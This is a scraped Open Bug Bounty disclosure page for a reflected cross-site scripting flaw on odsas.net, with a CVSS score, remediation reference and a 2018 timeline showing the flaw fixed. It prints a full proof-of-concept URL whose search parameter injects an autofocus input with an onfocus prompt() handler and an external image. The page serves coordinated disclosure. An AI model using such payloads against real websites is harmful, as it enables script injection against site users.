logo
DATABASE RESOURCES PRICING ABOUT US

odsas.net XSS vulnerability

Description

##### Open Bug Bounty ID: OBB-560666 Description| Value ---|--- Affected Website:| odsas.net Vulnerable Application:| Custom Code Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79 CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] Disclosure Standard:| Coordinated Disclosure based on ISO 29147 guidelines Remediation Guide:| OWASP XSS Prevention Cheat Sheet ##### Vulnerable URL: https://www.odsas.net/scan_sets.php?set_id=1537&serach;&search;_str=%22%27pantyhose%20high%20heels%3E%3Cinput/autofocus/onfocus%0C=prompt(/openbugbounty/)%3E%3Cimg%20src=%22https://healthylifestylepublication.com/wp-content/uploads/2016/12/iStock-536681400-1024x683.jpg%22%3E ##### Coordinated Disclosure Timeline Description| Value ---|--- Vulnerability Reported:| 16 February, 2018 04:29 GMT Vulnerability Verified:| 16 February, 2018 04:43 GMT Website Operator Notified:| 16 February, 2018 04:43 GMT Vulnerability Published:| 16 February, 2018 04:43 GMT[without any technical details] Vulnerability Fixed:| 31 March, 2018 10:24 GMT Public Disclosure:| 31 March, 2018 10:24 GMT